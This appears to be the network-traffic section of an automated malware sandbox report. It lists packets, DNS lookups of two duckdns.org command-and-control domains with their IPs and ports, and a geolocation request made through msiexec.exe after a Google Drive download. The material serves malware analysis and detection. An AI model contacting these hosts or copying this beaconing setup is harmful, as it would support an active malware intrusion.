Dec 13, 2024 08:50:39.542947054 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.543705940 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.543917894 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.543926954 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.544111013 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.544807911 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.544961929 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.544970989 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.545146942 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.545892000 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.546016932 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.546025038 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.546181917 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.546981096 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.547116041 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.547120094 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.547286034 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.548116922 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.548289061 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.548296928 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.548501015 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.549160004 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.549345016 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.549354076 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.549520969 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.550276041 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.550520897 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.550529957 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.550770998 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.551359892 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.551538944 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.551548004 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.551722050 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.552472115 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.552722931 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.552731037 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.552920103 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.553554058 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.553725958 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.553734064 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.553920984 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.554511070 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.554759979 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.554769039 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.554946899 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.555577040 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.555779934 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.555788994 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.555947065 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.556557894 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.556765079 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.556773901 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.556919098 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.557576895 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.557774067 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.557782888 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.557955027 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.558557034 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.558780909 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.558789015 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.558999062 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.559534073 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.559715033 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.559724092 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.559895039 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.560539007 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.560688019 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.560692072 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.560861111 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.561528921 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.561713934 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.561718941 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.561928988 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.562457085 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.562719107 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.562727928 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.562901020 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.563396931 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.563596010 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.563604116 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.563786030 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.564388990 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.564620018 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.564629078 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.564812899 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.565360069 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.565618992 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.565627098 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.565813065 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.566303968 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.566618919 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.566627979 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.566801071 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.567249060 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.567423105 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.567431927 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.567672014 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.568214893 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.568447113 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.568455935 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.568645000 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.569098949 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.569238901 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.569247007 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.569462061 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.570046902 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.570242882 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.570247889 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.570440054 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.570988894 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.571173906 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.571182013 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.571403027 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.571917057 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.572096109 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.572104931 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.572313070 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.572861910 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.573122978 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.573132038 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.573327065 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.573771954 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.573931932 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.573940992 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.574100971 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.574708939 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.574861050 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.574870110 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.575001955 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.575612068 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.575836897 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.575845957 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.575989008 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.576608896 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.576811075 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.576819897 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.577029943 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.577466965 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.577656984 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.577665091 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.577852011 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.578392029 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.578593016 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.578602076 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.578788042 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.579255104 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.579449892 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.579458952 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.579684973 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.580216885 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.580410004 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.580419064 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.580634117 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.581114054 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.581362009 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.581370115 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.581547976 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.582025051 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.582235098 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.582243919 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.582426071 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.582979918 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.583168983 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.583178043 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.583374023 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.583827019 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.584027052 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.584036112 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.584264994 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.584729910 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.584909916 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.584918976 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.585079908 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.585630894 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.585798979 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.585808039 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.586055994 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.586488008 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.586678982 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.586687088 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.586846113 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.587385893 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.587559938 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.587568045 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.587745905 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.588239908 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.588525057 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.588534117 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.588712931 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.589095116 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.589293957 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.589303017 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.589487076 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.590015888 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.590162039 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.590169907 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.590409994 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.590840101 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.591048002 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.591057062 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.591254950 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.591698885 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.591836929 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:39.591931105 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.592031956 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.592056036 CET	49715	443	192.168.11.20	108.177.122.132
Dec 13, 2024 08:50:39.592062950 CET	443	49715	108.177.122.132	192.168.11.20
Dec 13, 2024 08:50:48.113454103 CET	49716	2879	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:48.349673986 CET	2879	49716	192.169.69.26	192.168.11.20
Dec 13, 2024 08:50:48.349891901 CET	49716	2879	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:48.350111961 CET	49716	2879	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:48.634608030 CET	2879	49716	192.169.69.26	192.168.11.20
Dec 13, 2024 08:50:48.635799885 CET	49717	2889	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:48.854010105 CET	2889	49717	192.169.69.26	192.168.11.20
Dec 13, 2024 08:50:48.854183912 CET	49717	2889	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:48.857003927 CET	49717	2889	192.168.11.20	192.169.69.26
Dec 13, 2024 08:50:49.131221056 CET	2889	49717	192.169.69.26	192.168.11.20
Dec 13, 2024 08:50:49.282737970 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:49.555067062 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:49.555255890 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:49.555505991 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:49.800765038 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:49.802153111 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:50.046421051 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:50.095329046 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:50.166012049 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:50:50.371707916 CET	80	49719	178.237.33.50	192.168.11.20
Dec 13, 2024 08:50:50.371921062 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:50:50.372051954 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:50:50.582201004 CET	80	49719	178.237.33.50	192.168.11.20
Dec 13, 2024 08:50:50.582431078 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:50:50.610426903 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:51.204408884 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:51.581801891 CET	80	49719	178.237.33.50	192.168.11.20
Dec 13, 2024 08:50:51.581983089 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:50:51.813699007 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:50:52.520796061 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:52.521447897 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:59.768048048 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:50:59.769653082 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:51:00.388771057 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:51:00.388906002 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:51:01.505249977 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:51:01.505451918 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:51:01.631536961 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:51:29.945658922 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:51:29.947339058 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:51:30.830185890 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:51:31.678822994 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:52:00.088613987 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:52:00.089692116 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:52:00.382064104 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:52:25.043322086 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:25.574438095 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:26.636672974 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:28.745642900 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:30.274105072 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:52:30.276132107 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:52:30.580018044 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:52:32.963421106 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:41.383502007 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:52:58.223532915 CET	49719	80	192.168.11.20	178.237.33.50
Dec 13, 2024 08:53:00.444282055 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:53:00.445787907 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:53:00.739780903 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:53:30.593415976 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:53:30.594583035 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:53:30.886915922 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:54:00.737374067 CET	2879	49718	172.111.244.113	192.168.11.20
Dec 13, 2024 08:54:00.738496065 CET	49718	2879	192.168.11.20	172.111.244.113
Dec 13, 2024 08:54:01.136770010 CET	2879	49718	172.111.244.113	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:50:35.052189112 CET	51059	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:50:35.166699886 CET	53	51059	1.1.1.1	192.168.11.20
Dec 13, 2024 08:50:35.712951899 CET	60839	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:50:35.829119921 CET	53	60839	1.1.1.1	192.168.11.20
Dec 13, 2024 08:50:47.963767052 CET	51223	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:50:48.112231016 CET	53	51223	1.1.1.1	192.168.11.20
Dec 13, 2024 08:50:49.131860971 CET	63400	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:50:49.281646013 CET	53	63400	1.1.1.1	192.168.11.20
Dec 13, 2024 08:50:50.049469948 CET	57370	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:50:50.165311098 CET	53	57370	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:50:35.052189112 CET	192.168.11.20	1.1.1.1	0x9cbf	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.712951899 CET	192.168.11.20	1.1.1.1	0x1e8c	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:47.963767052 CET	192.168.11.20	1.1.1.1	0xcd90	Standard query (0)	eweo9264gtuiort.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:49.131860971 CET	192.168.11.20	1.1.1.1	0x891d	Standard query (0)	eweo9264gtuiorta1.duckdns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:50.049469948 CET	192.168.11.20	1.1.1.1	0x7801	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.102	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.101	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.100	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.139	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.113	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.166699886 CET	1.1.1.1	192.168.11.20	0x9cbf	No error (0)	drive.google.com	172.217.215.138	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:35.829119921 CET	1.1.1.1	192.168.11.20	0x1e8c	No error (0)	drive.usercontent.google.com	108.177.122.132	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:48.112231016 CET	1.1.1.1	192.168.11.20	0xcd90	No error (0)	eweo9264gtuiort.duckdns.org	192.169.69.26	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:49.281646013 CET	1.1.1.1	192.168.11.20	0x891d	No error (0)	eweo9264gtuiorta1.duckdns.org	172.111.244.113	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:50:50.165311098 CET	1.1.1.1	192.168.11.20	0x7801	No error (0)	geoplugin.net	178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49719	178.237.33.50	80	5324	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:50:50.372051954 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Dec 13, 2024 08:50:50.582201004 CET	1170	IN	HTTP/1.1 200 OK date: Fri, 13 Dec 2024 07:50:50 GMT server: Apache content-length: 962 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { 